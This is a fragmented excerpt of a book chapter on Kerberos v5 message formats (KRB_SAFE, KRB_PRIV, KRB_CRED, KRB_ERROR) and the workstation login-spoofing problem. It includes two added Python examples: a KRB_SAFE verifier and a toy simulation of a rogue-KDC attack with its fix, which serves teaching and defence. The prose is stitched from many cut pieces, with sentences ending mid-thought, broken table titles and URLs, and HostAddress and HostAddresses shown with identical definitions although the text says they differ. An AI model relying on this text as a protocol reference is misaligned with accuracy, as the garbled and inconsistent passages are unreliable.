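The KRB_SAFE generation and receipt steps above, as an added example in Python (not code from the book or from any Kerberos distribution). HMAC-SHA256 stands in for the keyed, collision-proof checksums the text names (RSA-MD5-DES, DES-MAC); the receiver runs the checks in the order given (version and type, addresses, then timestamp or sequence number, then the checksum) and reports the matching error code. The key, the addresses, the timestamps and the messages are constructed for the example.

```python
import hashlib, hmac, json
from typing import Any, Dict, Optional, Set, Tuple

CLOCK_SKEW = 300  # allowable clock skew in seconds (assumed value)


def keyed_checksum(key: bytes, body: Dict[str, Any]) -> str:
    # HMAC-SHA256 stands in for the keyed, collision-proof checksums the text names
    # (RSA-MD5-DES, DES-MAC); an unkeyed or weak checksum would not do here.
    return hmac.new(key, json.dumps(body, sort_keys=True).encode(), hashlib.sha256).hexdigest()


def build_safe(key: bytes, user_data: str, s_address: str, r_address: str,
               timestamp: int, usec: int, seq: Optional[int]) -> Dict[str, Any]:
    """Sender side: user data plus control information, all covered by the checksum."""
    body = {"user-data": user_data, "timestamp": timestamp, "usec": usec,
            "seq-number": seq, "s-address": s_address, "r-address": r_address}
    return {"pvno": 5, "msg-type": "KRB_SAFE", "safe-body": body, "cksum": keyed_checksum(key, body)}


class SafeReceiver:
    """Receiver side. With first_seq set it relies on sequence numbers (every message
    is expected to arrive); with first_seq=None it relies on the timestamp, for a
    protocol that tolerates lost messages, and keeps a replay cache instead."""

    def __init__(self, key: bytes, my_addrs, now: int, first_seq: Optional[int] = None):
        self.key, self.my_addrs, self.now, self.expected_seq = key, set(my_addrs), now, first_seq
        self.seen: Set[Tuple[str, int, int]] = set()

    def verify(self, msg: Dict[str, Any], os_sender_addr: str) -> Optional[str]:
        """Return None if the message is accepted, else the error code to report."""
        if msg.get("pvno") != 5:
            return "KRB_AP_ERR_BADVERSION"
        if msg.get("msg-type") != "KRB_SAFE":
            return "KRB_AP_ERR_MSG_TYPE"
        body = msg["safe-body"]
        # The address the OS reports for the sender must match the one in the message,
        # and a recipient address, if present, must be one of ours.
        if body.get("s-address") != os_sender_addr or (
                body.get("r-address") is not None and body["r-address"] not in self.my_addrs):
            return "KRB_AP_ERR_BADADDR"
        if self.expected_seq is None:
            ts, us = body.get("timestamp"), body.get("usec")
            if ts is None or us is None or abs(ts - self.now) > CLOCK_SKEW:
                return "KRB_AP_ERR_SKEW"
            if (body["s-address"], ts, us) in self.seen:
                return "KRB_AP_ERR_REPEAT"
        elif body.get("seq-number") != self.expected_seq:
            return "KRB_AP_ERR_BADORDER"
        if not hmac.compare_digest(keyed_checksum(self.key, body), msg.get("cksum", "")):
            return "KRB_AP_ERR_MODIFIED"
        # Advance replay state only for a message that passed every check, so a forged
        # message cannot burn a sequence number or plant an entry in the cache.
        if self.expected_seq is None:
            self.seen.add((body["s-address"], body["timestamp"], body["usec"]))
        else:
            self.expected_seq += 1
        return None


def demo() -> Dict[str, Optional[str]]:
    """Constructed exchange from a client at 10.0.0.5 to a server at 10.0.0.1."""
    key, now = b"\x01" * 16, 1_000_000          # constructed session (or sub-session) key
    rx = SafeReceiver(key, ["10.0.0.1"], now, first_seq=1)
    m1 = build_safe(key, "set quota 10", "10.0.0.5", "10.0.0.1", now, 1, seq=1)
    m2 = build_safe(key, "set quota 20", "10.0.0.5", "10.0.0.1", now, 2, seq=2)
    m5 = build_safe(key, "set quota 30", "10.0.0.5", "10.0.0.1", now, 5, seq=3)
    forged = {**m2, "safe-body": {**m2["safe-body"], "user-data": "set quota 99"}}
    lossy = SafeReceiver(key, ["10.0.0.1"], now)  # timestamp mode, no sequence numbers
    m3 = build_safe(key, "ping", "10.0.0.5", "10.0.0.1", now - 900, 3, seq=None)
    m4 = build_safe(key, "ping", "10.0.0.5", "10.0.0.1", now + 10, 4, seq=None)
    return {
        "first":        rx.verify(m1, "10.0.0.5"),      # None: accepted
        "replayed":     rx.verify(m1, "10.0.0.5"),      # KRB_AP_ERR_BADORDER (seq 2 expected)
        "forged":       rx.verify(forged, "10.0.0.5"),  # KRB_AP_ERR_MODIFIED
        "second":       rx.verify(m2, "10.0.0.5"),      # None
        "spoofed_addr": rx.verify(m5, "10.0.0.7"),      # KRB_AP_ERR_BADADDR
        "stale":        lossy.verify(m3, "10.0.0.5"),   # KRB_AP_ERR_SKEW
        "fresh":        lossy.verify(m4, "10.0.0.5"),   # None
        "replayed_ts":  lossy.verify(m4, "10.0.0.5"),   # KRB_AP_ERR_REPEAT
    }
```

A receiver built with first_seq expects every message to arrive in order; one built without it relies on the timestamp and a replay cache, which is the mode for a protocol that tolerates lost messages. In both modes the replay state is advanced only after the checksum verifies, so a message with a bad checksum cannot consume a sequence number or plant an entry in the cache.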


KRB_SAFE Message Specification
This section specifies the format of a message that can be used by either side, client or server,
of an application to send a tamperproof message to its peer
...



KRB_SAFE Definition
The KRB_SAFE message contains user data along with a collision-proof checksum keyed with
the session key
...
Table 9.9
KRB_SAFE Message Fields
Field

Description

pvno and msg-type

Described earlier
...


safe-body

Serves as a placeholder for the body of the KRB-SAFE message
...


cksum

Contains the checksum of the application data
...


user-data

Part of the KRB_SAFE and KRB_PRIV messages
...


timestamp

Part of the KRB_SAFE and KRB_PRIV messages
...
By checking the
timestamp, the recipient of the message is able to make sure that it was
recently generated, and is not a replay
...
It contains the
microsecond part of the timestamp
...

Table 9.9, Continued
...


r-address

Specifies the address in use by the recipient of the message
...
This field, along with s-address,
can be used to help detect messages that have been incorrectly or
maliciously delivered to the wrong recipient
...


Generation of a KRB_PRIV Message
When an application needs to send a KRB_PRIV message, it collects its data and the appropriate control information and encrypts them under an encryption key, usually the last key
negotiated via subkeys, or if no negotiation has occurred, the session key
...
After the
user data and control information are encrypted, the client transmits the ciphertext and some
“envelope” information to the recipient
...
If any error
occurs, an error code is reported for use by the application
...
A mismatch generates a
KRB_AP_ERR_BADVERSION or KRB_AP_ERR_MSG_TYPE error
...
If decryption shows the data to
have been modified, a KRB_AP_ERR_BAD_INTEGRITY error is generated
...
If a recipient address is specified or the recipient requires an address, then it
checks that one of the recipient’s addresses appears as the recipient’s address in the message
...

Then the timestamp and usec and/or the sequence number fields are checked
...
If the server name along with the client name, time, and microsecond fields from the Authenticator match any recently seen such tuples, the
KRB_AP_ERR_REPEAT error is generated
...
If neither a timestamp and usec nor a sequence number is present, a
KRB_AP_ERR_MODIFIED error is generated
...


KRB_PRIV Message Specification
This section specifies the format of a message that can be used by either side, client or server,
of an application to send, securely and privately, a message to its peer
...


KRB_PRIV Definition
The KRB_PRIV message contains user data encrypted in the Session Key
...
Table 9.10 describes the fields for this message
...
Table 9.10
KRB_PRIV Message Fields
Field

Description

pvno and msg-type

Described earlier
...


enc-part

Holds an encoding of the EncKrbPrivPart sequence encrypted under
the session key
...

Table 9.10, Continued
...


seq-number

Described earlier
...
It achieves this by sending the tickets together with
encrypted data that contain the session keys and other information associated with the tickets
...
Then it uses the ticket or tickets it obtains to construct a KRB_CRED
message
...

Other information associated with each ticket and obtained during the KRB_TGS exchange
also is placed in the corresponding KrbCredInfo sequence in the encrypted part of the
KRB_CRED message
...
It is then encrypted under an encryption key previously exchanged in the KRB_AP
exchange
...
If any error occurs, an error
code is reported for use by the application
...
A
mismatch generates a KRB_AP_ERR_BADVERSION or KRB_AP_ERR_MSG_TYPE error
...
If
decryption shows the data to have been modified, a KRB_AP_ERR_BAD_INTEGRITY error
is generated
...

Next it checks that one of the recipient’s addresses appears as the recipient’s address in the
message
...
The timestamp and usec fields, and the nonce field if required, are checked next
...

If all the checks succeed, the application stores each of the new tickets in its ticket cache
together with the session key and other information in the corresponding KrbCredInfo
sequence from the encrypted part of the KRB_CRED message
...
It presumes that a session key has already been exchanged
perhaps by using the KRB_AP_REQ/KRB_AP_REP messages
...
The information needed to use the tickets
is encrypted under an encryption key previously exchanged
...
Table 9.11 describes the fields in this message
...
Table 9.11
KRB_CRED Message Fields
Field

Description

pvno and msg-type

Described earlier
...


tickets

The tickets obtained from the Key Distribution Center specifically
for use by the intended recipient
...


enc-part

Holds an encoding of the EncKrbCredPart sequence encrypted
under the session key shared between the sender and the intended
recipient
...


nonce

If practical, an application may require the inclusion of a nonce
generated by the recipient of the message
...
A nonce
must never be reused
...
The
time is used to provide assurance that the message is fresh
...
Used to provide additional assurance of the
integrity of the KRB-CRED message
...


The following fields are optional
...
If left out, it is assumed that the recipient of the credentials already knows
their value
...


flags, authtime, starttime,
endtime, renew-till,
srealm, sname, and
caddr

Contain the values of the corresponding fields from the
ticket found in the ticket field
...

Names
Kerberos realms are encoded as GeneralString
...
Most realms consist of several components separated by periods (.)
...
X.500 names
...
Specifies the type of name that follows
...
Encodes a sequence of components that form a name
...
Taken together, a PrincipalName and a Realm form a
principal identifier
...
No two names can be the same
...


Time
The timestamps used in Kerberos are encoded as GeneralizedTime
...
It further
cannot include any separators
...


Host Addresses
Kerberos messages usually contain a reference to a specific host, or a list of hosts
...
A host address is a sequence of components consisting
of the following subfields:
HostAddress = {
    addr-type[0]   INTEGER,
    address[1]     BYTE STRING
}

HostAddresses = {
    addr-type[0]   INTEGER,
    address[1]     BYTE STRING
}

The host address encoding consists of the following two fields:

- addr-type
...

- address
...

The two forms differ slightly
...
HostAddresses
contains a sequence of possibly many addresses
...
Specifies the format for the ad-data subfield
...
Non-negative values are reserved for registered use
...
Contains authorization data to be interpreted according to the value of the
corresponding ad-type field
...
The contents
of this field should be displayed to users to enable them to detect unauthorized use of their
account
...
Table 9.12 describes the fields in this message
...
Table 9.12
Last Request Fields
Field

Description

lr-type

Indicates how the following lr-value field is to be interpreted
...
Non-negative
values pertain to all servers for the realm
...


1   Time of last initial request for a Ticket Granting Ticket
...

3   Time of issue for newest Ticket Granting Ticket used
...

5   Time of last request of any type
...
The time must be interpreted according to
the contents of the accompanying lr-type subfield
...
The fields included in the
message are intended to return as much information as possible about an error
...
If the appropriate information is not available during composition of the message, the corresponding field is
left out of the message
...
In particular, this means that the client should not use
any fields in this message for security-critical purposes, such as setting a system clock or
generating a fresh Authenticator
...


KRB_ERROR Definition
The KRB_ERROR message consists of the following fields:

KRB-ERROR = {
    pvno[0]         INTEGER,
    msg-type[1]     INTEGER,
    ctime[2]        KerberosTime OPTIONAL,
    cusec[3]        INTEGER OPTIONAL,
    stime[4]        KerberosTime,
    susec[5]        INTEGER,
    error-code[6]   INTEGER,
    crealm[7]       Realm OPTIONAL,
    cname[8]        PrincipalName OPTIONAL,
    realm[9]        Realm,            -- Correct realm
    sname[10]       PrincipalName,    -- Correct name
    e-text[11]      GeneralString OPTIONAL,
    e-data[12]      BYTE STRING OPTIONAL
}

Table 9
...
msg-type is KRB_ERROR
...


cusec

Described earlier
...


susec

Contains the microsecond part of the server’s timestamp
...


crealm, cname, srealm,
and sname

Described earlier
...
It might include, for example, a principal
name that was unknown
...
If the errorcode is
KDC_ERR_PREAUTH_REQUIRED, the e-data field contains
an encoding of a sequence of padata fields, each corresponding to
an acceptable preauthentication method and optionally containing
data for the method
...
Table 9.14 describes the fields in this option
...
Table 9.14
Error Method Field Descriptions
Field

Description

method-type

Indicates the required alternative method
...


Kerberos Workstation Authentication
Problem
Requests for Kerberos Ticket Granting Tickets are sent in plaintext to the Kerberos server,
which responds with credentials encrypted in the requesting principal’s secret key
...

The problem here is that the requesting program cannot know for sure whether the decryption
succeeded or, more importantly, whether the response actually came from the Kerberos server
...
Kerberos eventually responds with an appropriate error, but the attacker can arrange
for another program to deliver a fake response to log in first
...

The solution to this problem is for login to verify the Ticket Granting Ticket by using it to
acquire a service ticket with a known key and comparing the results
...
ticket, where is the local host name, and checking
the response against the key stored in the machine’s /etc/srvtab file
...

The solution works only as long as the host has a srvtab containing an rcmd
...
This is fine for physically secure or single-user workstations, but does not work on public workstations in which anyone could access the srvtab
file
...
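The attack and the fix described above, modelled in Python as an added example (not code from the book or from MIT Kerberos). The real KDC holds every principal's key, including the host key that /etc/srvtab holds on the workstation; the rogue KDC answers the plaintext TGT request before the real one and knows only the password the attacker is about to type. A keyed HMAC tag over a JSON body stands in for Kerberos encryption, a SHA-256 hash stands in for string-to-key, and the principal name form rcmd.<hostname>, the host name and the passwords are assumptions constructed for the example.

```python
import hashlib, hmac, json, os
from typing import Any, Dict, Optional, Tuple


def kdf(password: str) -> bytes:
    # string-to-key stand-in: the principal's secret key derived from the password
    return hashlib.sha256(b"string-to-key|" + password.encode()).digest()


def seal(key: bytes, fields: Dict[str, Any]) -> Dict[str, str]:
    # Stand-in for Kerberos encryption: a JSON body with a keyed tag. Only a holder of
    # the key can produce a body that opens, which is the property the attack turns on.
    body = json.dumps(fields, sort_keys=True)
    return {"body": body, "tag": hmac.new(key, body.encode(), hashlib.sha256).hexdigest()}


def open_sealed(key: bytes, enc: Dict[str, str]) -> Optional[Dict[str, Any]]:
    tag = hmac.new(key, enc["body"].encode(), hashlib.sha256).hexdigest()
    return json.loads(enc["body"]) if hmac.compare_digest(tag, enc["tag"]) else None


Reply = Tuple[Dict[str, str], Dict[str, str]]   # (ticket, part encrypted for the client)


class RealKdc:
    """Holds every principal's key: users' password keys and the hosts' srvtab keys."""

    def __init__(self, keys: Dict[str, bytes]):
        self.keys = keys

    def as_exchange(self, cname: str) -> Reply:
        sk = os.urandom(16)
        return (seal(self.keys["krbtgt"], {"cname": cname, "key": sk.hex()}),
                seal(self.keys[cname], {"key": sk.hex()}))

    def tgs_exchange(self, tgt: Dict[str, str], sname: str) -> Optional[Reply]:
        t = open_sealed(self.keys["krbtgt"], tgt)
        if t is None or sname not in self.keys:
            return None
        sk2 = os.urandom(16)
        return (seal(self.keys[sname], {"cname": t["cname"], "key": sk2.hex()}),
                seal(bytes.fromhex(t["key"]), {"key": sk2.hex()}))


class RogueKdc:
    """Attacker's machine answering the plaintext TGT request before the real KDC.
    It knows the password the attacker is about to type, and nothing else."""

    def __init__(self, typed_password: str):
        self.fake_user_key, self.guessed_host_key = kdf(typed_password), os.urandom(16)

    def as_exchange(self, cname: str) -> Reply:
        self.sk = os.urandom(16)
        return seal(os.urandom(16), {"cname": cname}), seal(self.fake_user_key, {"key": self.sk.hex()})

    def tgs_exchange(self, tgt: Dict[str, str], sname: str) -> Optional[Reply]:
        sk2 = os.urandom(16)   # it cannot encrypt under the real host key it never had
        return (seal(self.guessed_host_key, {"cname": "?", "key": sk2.hex()}),
                seal(self.sk, {"key": sk2.hex()}))


def login_unverified(kdc, user: str, password: str) -> bool:
    """The flawed check: 'the reply decrypted under the typed password, so it is genuine'."""
    _tgt, enc = kdc.as_exchange(user)
    return open_sealed(kdf(password), enc) is not None


def login_verified(kdc, user: str, password: str, hostname: str, srvtab: Dict[str, bytes]) -> bool:
    """The fix: use the TGT to obtain a service ticket for this host and check it
    against the host key in /etc/srvtab, which a fake KDC cannot know."""
    tgt, enc = kdc.as_exchange(user)
    creds = open_sealed(kdf(password), enc)
    if creds is None:
        return False
    service = f"rcmd.{hostname}"   # principal name form is an assumption here
    rep = kdc.tgs_exchange(tgt, service)
    if rep is None:
        return False
    ticket, enc2 = rep
    svc = open_sealed(srvtab[service], ticket)
    mine = open_sealed(bytes.fromhex(creds["key"]), enc2)
    return svc is not None and mine is not None and svc["key"] == mine["key"] and svc["cname"] == user


def demo() -> Dict[str, bool]:
    host = "ws1.example.com"
    srvtab = {f"rcmd.{host}": os.urandom(16)}     # constructed /etc/srvtab contents
    real = RealKdc({"krbtgt": os.urandom(16), "alice": kdf("correct horse"), **srvtab})
    rogue = RogueKdc("letmein")                    # attacker will type "letmein" at the workstation
    return {
        "real_kdc_unverified":  login_unverified(real, "alice", "correct horse"),            # True
        "rogue_kdc_unverified": login_unverified(rogue, "alice", "letmein"),                 # True: attack succeeds
        "rogue_kdc_verified":   login_verified(rogue, "alice", "letmein", host, srvtab),     # False: forged ticket rejected
        "real_kdc_verified":    login_verified(real, "alice", "correct horse", host, srvtab),  # True
        "real_kdc_wrong_pw":    login_verified(real, "alice", "wrong", host, srvtab),        # False
    }
```

login_unverified accepts the rogue reply because it decrypts under the typed password, which is exactly the flaw; login_verified additionally asks the same KDC for a service ticket for the local host and opens it with the srvtab key, and the rogue's forged ticket fails that check. As the text notes, this only helps where the srvtab cannot be read by the people using the workstation.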
append in the MIT Kerberos distribution contains the commonly used port assignments
...
Kerberos has officially been moved to port 88, although people will have to listen on port 750 for some time to come
and assume that many servers won’t be converted to listen to port 88 for some time
...
Furthermore, both of their port
numbers have already been assigned to other services, so requesting an official assignment
forces them to change
...
Their
ports currently aren’t assigned to other services, so hopefully they will not have to change if an
official assignment is requested
...
A separate document, RFC1411, describes how that option is to be used with
Kerberos version 4, but no RFC exists for its use with Kerberos version 5
...
The standard for full encryption remains
under development
...
uu
...
91
...
25
...
Z

It predates both of the earlier-mentioned RFCs, however, and therefore almost certainly isn’t
compliant with them
...
4BSD
telnet/telnetd, also exists, but has been temporarily removed from distribution—probably
because it also does not comply with the proposed standards
...
txt>, which defines
Kerberos version 4 and GSS-API authentication systems
...
bellcore
...
tar
...

The WWW offers much useful information, but it changes frequently enough that listing sites
here would be pointless
...

The main newsgroup is comp
...
kerberos